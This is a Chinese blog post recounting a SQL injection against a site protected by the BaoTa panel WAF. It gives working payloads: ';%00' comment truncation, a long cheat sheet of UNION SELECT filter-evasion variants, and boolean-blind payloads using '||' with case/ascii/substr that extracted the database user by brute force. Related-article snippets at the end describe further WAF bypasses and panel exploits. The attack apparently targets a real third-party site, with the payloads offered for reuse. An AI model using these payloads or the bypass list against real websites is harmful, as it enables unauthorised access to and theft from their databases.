宝塔面板的sql注入绕过

最新推荐文章于 2024-05-27 11:17:38 发布
最新推荐文章于 2024-05-27 11:17:38 发布
阅读量7.9k 收藏 36
点赞数 11
分类专栏: sql 注入绕过 文章标签: sql 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48421613/article/details/115181668
版权

一次宝塔sql注入绕过

宝塔防护

在一次挖cvnd漏洞的时候,遇到了宝塔面板的防护,此waf屏蔽了传统的注释符“–+”、"#"、 “/*” , union select 做了防护而且似乎还做了过滤,废了半天劲绕过去发现联合查询不能被执行了,order by 虽然能用但是也没了卵用,搞了半天搞了个寂寞,正当我就要放弃的时候,我想起了使用布尔盲注,结果…玛德法克…

sql注入尝试

老生常谈了哈,日站第一步当然需要确定是不是真的存在sql注入

  1. 输入单引号进行注入测试
    首先页面是这个样子的 ?id=11
    在这里插入图片描述

  2. 输入测试poyload单引号
    输入单引号内容不见 ?id=11'
    在这里插入图片描述

  3. 再输入一个单引号进行闭合
    闭合单引号后数据重新出现,说明此处可能是基于单引号的盲注类型
    ?id=11''
    在这里插入图片描述

  4. 注释符的尝试
    此防护为宝塔waf防护,输入"-- -" 、"#" 、 “/*” 常见的注释符发现会直接被拦截,并且井字符并没卵用
    在这里插入图片描述

  5. 注释符过滤不全
    此时我想起一个注释符 “;%00” 截断,发现,芜湖,直接起飞
    ?id=11' ;%00
    在这里插入图片描述

联合查询的尝试

解决了注释符的问题,现在开始尝试联合查询,联合查询第一步当然是进行order by 操作

  1. order by 猜测字段个数
    使用二分法即可快速的猜测字段个数,在前几篇文章有详细介绍,在这里不做赘述,这里没有屏蔽 order by
    ?id=11' order by 26 ;%00
    在这里插入图片描述在这里插入图片描述

  2. 联合查询失败
    当我想使用联合查询的时候,发现Union select 进去就会被拦截,大小写什么的,修改请求方式,内联注释,垃圾数据填充,编码转换都失败了,最后空字节可以,但是并不能被执行,所以很有可能是联合查询被过滤掉了
    在这里插入图片描述不举太多例子了,结果都一样,那就是被拦截

+#uNiOn+#sEleCt 没拦截,但是也没好使,淦
在这里插入图片描述以下省略n多尝试,最后的结论就是联合查询不好使,绝望,附上联合查询的绕过方式


 /*!%55NiOn*/ /*!%53eLEct*/
 
 %55nion(%53elect 1,2,3)-- -
 
 +union+distinct+select+
 
 +union+distinctROW+select+
 
 /**//*!12345UNION SELECT*//**/
 
 /**//*!50000UNION SELECT*//**/
 
 /**/UNION/**//*!50000SELECT*//**/
 
 /*!50000UniON SeLeCt*/
 
 union /*!50000%53elect*/
 
 +#uNiOn+#sEleCt
 
 +#1q%0AuNiOn all#qa%0A#%0AsEleCt
 
 /*!%55NiOn*/ /*!%53eLEct*/
 
 /*!u%6eion*/ /*!se%6cect*/
 
 +un/**/ion+se/**/lect
 
 uni%0bon+se%0blect
 
 %2f**%2funion%2f**%2fselect
 
 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 
 REVERSE(noinu)+REVERSE(tceles)
 
 /*--*/union/*--*/select/*--*/
 
 union (/*!/**/ SeleCT */ 1,2,3)
 
 /*!union*/+/*!select*/
 
 union+/*!select*/
 
 /**/union/**/select/**/
 
 /**/uNIon/**/sEleCt/**/
 
 /**//*!union*//**//*!select*//**/
 
 /*!uNIOn*/ /*!SelECt*/
 
 +union+distinct+select+
 
 +union+distinctROW+select+
 
 +UnIOn%0d%0aSeleCt%0d%0a
 
 UNION/*&test=1*/SELECT/*&pwn=2*/
 
 un?+un/**/ion+se/**/lect+
 
 +UNunionION+SEselectLECT+
 
 +uni%0bon+se%0blect+
 
 %252f%252a*/union%252f%252a /select%252f%252a*/
 
 /%2A%2A/union/%2A%2A/select/%2A%2A/
 
 %2f**%2funion%2f**%2fselect%2f**%2f
 
 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 
 /*!UnIoN*/SeLecT+
  %55nion(%53elect)
 
   union%20distinct%20select
 
   union%20%64istinctRO%57%20select
 
   union%2053elect
 
   %23?%0auion%20?%23?%0aselect
 
   %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
 
   %55nion %53eLEct
 
   u%6eion se%6cect
 
   unio%6e %73elect
 
   unio%6e%20%64istinc%74%20%73elect
 
   uni%6fn distinct%52OW s%65lect
 

   %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

布尔盲注尝试

联合查询失败后,我想起我还会点布尔盲注,走一波

  1. 真假盲注测试
    使用真假盲注 and 1=1 or 1=1 进行真假盲注测试
    ?id=11' and 1=1 ;%00
    额呵,被屏蔽了

  2. 再次转换
    尝试了 and -1=-1 and true or -1=-1 or false 依然被屏蔽
    在这里插入图片描述
    经过我的测试,此宝塔不会单独屏蔽 and 、 or 、= 但是当二者放在一块的时候就会被拦截,那么能不能绕过呢?

  3. 转换等号失败
    我最先想到的是转换等于号,进行url转换
    在这里插入图片描述
    很显然失败了,经过多轮转换都没行,我都要放弃了,这个时候我想起来逻辑运算符,等于不能转换,我可以转换and 和 or 啊!

  4. 逻辑与转换失败
    逻辑与 and 等同于 &&
    在这里插入图片描述

没好使
4. 逻辑或转换
逻辑或 or 等同于 ||
?id=11' || not true ;%00
在这里插入图片描述芜湖,成功了,我真是个小机灵鬼

真假盲注运用

  1. 用户长度的猜测
    ?id=11 || not length(user())=8 ;%00
    这条payload的作用就是结合逻辑与,当用户长度等于8的时候就位真,等同于 or not 8=8 也就会返回当前页面,利用这一点可以使用burpsuite进行暴力破解猜测用户名的长度,废话不多说,走你
    在这里插入图片描述此时用户长度当然不是8所以是假的,所以页面发生了变化,上burp
    在这里插入图片描述得到用户名长度为19
    在这里插入图片描述
  2. 用户名的猜测
    ?id=11 || not 1=(case when ascii(substr(user(),1,1))=127 then 2 else 1 end);%00
    这条payload的作用就是逐一爆破用户名,利用了ascii转换以及三元运算,substr()为字符串截取,和mid()有异曲同工之处;当第一位字符串为ascii对应的127时为真
    在这里插入图片描述由于ascii中真正有用的其实就是32-127,所以payload中只用到用户的长度1-19 ,ascii 32-127
    在这里插入图片描述
    将ascii按照顺序进行编码转换,得到用户名为
    wxxxxxxxx@localhost

举例到此结束

vlan911
关注
  • 11
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
宝塔最新未授权访问漏洞及sql注入
m0_52514790的博客
02-23 1217
整个宝塔 WAF 核心防护功能的代码写的确实有点粗糙,代码组织方式不像一个成熟软件该有的架构,小 Bug 一眼望不到头,今天分享的是一个未授权访问漏洞,普通用户可以无视宝塔的随机登录地址,无视宝塔的登录密码,直接操作后台的数据,实现人人都是管理员的效果。这段代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中,源文件是 luajit 编译后的内容,反编译一下即可看到源码。话说这是临时工写的代码吧,对于宝塔的配置来说,要满足这两个条件很难吗?
Nginx中防止SQL注入攻击的相关配置介绍
09-30
黑客可能会使用更复杂的绕过方法。为了更全面地防止SQL注入,最佳实践是在应用程序层面进行输入验证和转义。例如,使用预编译的SQL语句、参数化查询或者使用安全的ORM框架。 此外,定期更新Nginx和Web应用程序的...
记一次绕过宝塔防火墙的BC站渗透
最新发布
小司机的奥拓
05-27 438
由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息这是一个查询代理帐号的站 url输入admin 自动跳转至后台看这个参数 猜测可能是thinkCMFthinkcmf正好有一个RCE 可以尝试一下白屏是个好兆头 应该是成功了访问一下尝试蚁剑连接 直接报错 猜测可能遇到防火墙了然后再回来看一下shell 手动尝试一个phpinfo果然存在宝塔防火墙。
记一次SQL注入绕过宝塔+云waf
2301_80115097的博客
12-27 524
发现这两个没有回应真实ip,就去看看用fofa或者hunter来在真实ip,hunter上面显示183是云厂商肯定是云waf,不能用这个ip。首先判断出字符型的话,就得去测试’||||’ ‘or+or’的语句,但是我发现他这里只要是在两个or之间出现东西,就一定会触发宝塔waf。看看这函数怎么搞的,把里面的语句替换成1,看看哪里出了问题,发包,发现他这个1直接爆出来了。既然这函数可以用,那我们就开始构造语句试试,正常的语句用不了,那我们就玩点不正常的。哟西,果然能行,出库名了,成功绕过waf。
2024年最全深入waf绕过 (云盾,宝塔安全狗)(19(1),2024年最新字节大牛耗时八个月又一力作
2401_84545830的博客
05-11 587
这里说一下mysql数据库的特性,只限于MySQL数据库,/*!这句sql语句的意思是,如果数据库的版本大于5.00.1,就执行这一段sql语句,如果不大于就不执行这段sql语句,50001是可变的。演示一下也是一种绕过方式,不过是mysql特有的。对sql语句的编译有很多,下面这些都是在第二关可执行的语句这种最好写个脚本跑。重点开始阿里云盾防sql注入简要分析。
实战绕过宝塔PHP disable_function 限制getshell
zhangge3663的博客
03-09 3641
一、这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个站点感觉是被二次开发过的,站点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。 三、这里想着尝试绕过验证码来对后台用户名密码进
深入waf绕过 (云盾,宝塔,算法题+网络安全+自定义View
2301_82244392的博客
04-09 872
演示一下这个扫描用正常的扫描软件,去扫描/sqli-labs-master/Less-2,第二关靶场,不光扫描结果是错的,还会互相因为访问频率过快waf拦截的情况,但是如果是自己写的脚本去伪造百度搜索引擎的爬虫,为造出官方搜索引擎去扫描,就不会被拦截,因为他是白名单,用这样去伪造官方扫描,不仅网站不会显示访问过于频繁拦截,结果还都是正确的。这里说一下mysql数据库的特性,只限于MySQL数据库,/*!
18、SQL注入之堆叠及WAF绕过注入
山兔的博客
08-08 329
所以WAF绕过是针对某个漏洞、某个攻击方式的绕过,不是单纯的说怎么绕过,我们能不能进行突破,绕过是有个目标的,这个绕过的东西不一样,方法和思路是不一样的,因为每个东西都有相应的检测规则和绕过方式。程序员在开发这款软件的时候,它会有这个检测,检测是通过代码实现的,所以检测的全,我们就无法绕过,检测的不全,我们就有空子可以钻;我们在实际测试过后,我们这个思路会有点险隘,这个时候,我们就把可能性写到脚本里面,让脚本去帮我们跑,跑出来之后,分析为什么能绕过就完事了,上面那些绕过语句,全都是用fuzz跑出来的。
宝塔php漏洞,宝塔面板 7.4.2 严重漏洞,可绕过验证直接登录数据库。附宝塔面板升级方法...
weixin_42495504的博客
03-26 2892
宝塔面板官方今天发布公告说明宝塔 7.4.2 存在严重安全漏洞,目前已经进行了紧急安全更新,并发布了 7.4.3 版本,请所有宝塔面板7.4.2 的用户务必更新到最新版,否者这个漏洞可以绕过验证直接通过 phpMyAdmin 登录 MySQL 数据库。一、宝塔安全漏洞详情装有宝塔面板的用户,访问以下网址:http://自己的IP:888/pma如果可以绕过验证直接进入 phpMyAdmin,请立...
2023 宝塔面板第三方云端源码1.9版本
10-20
你可以使用此程序搭建属于自己的宝塔面板第三方云端,实现最新版宝塔面板私有化部署,不与宝塔官方接口通信,满足隐私安全合规需求。同时还可以去除面板强制绑定账号,DIY面板功能等。 网站后台管理可一键同步宝塔...
SQL注入-9种绕过Web应用程序防火墙的方式.rar
09-25
SQL注入-9种绕过web应用程序防火墙的方式,属于比较基础的,可以学习参考
windows宝塔面板安装包
11-20
最初布署网站环境,是apache、PHP、数据库等一个一个安装的,老麻烦了对于新手来说,现在一般都使用一键布置网络环境,我用过XAMPP、bitnami(部署redmind和testlink)等一键...最近偶尔机会接触到了宝塔,还是蛮好用的,
玩客云一键安装宝塔面板
07-06
通过该软件可以一键安装宝塔面板,软件为最新版,来自论坛分享
常见安全漏洞及其解决方案
A_991128a的博客
06-17 6129
执行时,此后的文本将被忽略。但这并不是无代价的,受到损失最大的就是被控制的网站,往往随着暗链所指向的网站的权重不断提高,存在暗链的网站的权重将不断下降,搜索引擎排名也必然一再下降,严重影响网站的影响力。漏洞危害:该漏洞是通过版本号探测的,可能存在误报Apache HTTP Server是一款开源的流行的HTTPD服务程序.当处理包含大量Ranges头的HTTP请求时,ByteRange过滤器存在一个错误,攻击者可以向服务器发送特制HTTP请求,消耗大量内存,造成应用程序崩溃CVE-2011-3192。
宝塔如何绕过验证
发发的博客
11-12 4311
问题 双十一在腾讯云租了台轻量级服务器,想要绑定下宝塔吗,结果死活绑不上,我部署的是腾讯自带的宝塔镜像!,总是说账号密码不对 我已经改了好几次密码了,而且也用别的手机号注册尝试登录过!结果都一样!所以我就打算去绕过了 =_= 绕过操作 两种方式 方式一:重命名 bind.pl 文件 # 回到根目录 [root@test ~] cd / # 进入bind.pl所在的文件目录 [root@test ~] cd /www/server/panel/data # 重命名bind.pl [root@.
SQL注入漏洞(绕过篇)
errorr0
06-24 4638
SQL注入绕过手法
宝塔漏洞 XSS窃取宝塔面板管理员漏洞 高危
weixin_34161083的博客
11-12 3267
宝塔是近几年刚崛起的一款服务器面板,深受各大站长的喜欢,windows2003 windows2008windosws 2012系统,linux centos deepin debian fedora系统都可以使用宝塔面板来管理服务器,宝塔可以一键部署网站的环境,IIS环境搭建,Nginx环境,PHP环境搭建,apache jsp环境,mysql数据库...
WAF绕过-漏洞利用之注入上传跨站等绕过
xhscxj的博客
02-22 1802
waf主要拦截的就是上图漏洞 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload Aliyun:基本修改指纹即可 宝塔:匹配关键字外加/*等 sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent #文件上传 1.php 截断 参考前面上传 waf 绕过 payload #XSS 跨站 利用 XSStrike 绕过 加上--tim.
Linux 宝塔面板密码忘记解决方法
热门推荐
M.Yang的博客
11-28 1万+
  打开远程链接命令窗口或shell窗口,输入一下命令 :cd /www/server/panel && python tools.pyc panel passwd;passwd为修改后的密码,返回的就是面板登录用户名,我的为:admin     2.如果提示多次登录失败,暂时禁止登录 请输入以下命令 清除登录限制,命令为:rm -f /www/server/panel/da...
linux系统宝塔面板显示窗口尺寸过小怎么办
03-27
如果您使用的是宝塔面板的Linux版本,您可以通过以下步骤更改窗口大小: 1. 打开终端,并进入宝塔面板的安装目录。 2. 执行以下命令来打开配置文件: ``` vi /www/server/panel/data/conf/panel.conf ``` 3. 在配置文件中找到以下行: ``` # default values width=1000 height=600 ``` 4. 更改width和height的值来调整窗口大小。例如,将宽度改为1200,高度改为800: ``` width=1200 height=800 ``` 5. 保存并关闭配置文件,然后重新启动宝塔面板。 ``` /etc/init.d/bt restart ``` 6. 打开宝塔面板,您应该会看到新的窗口大小。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值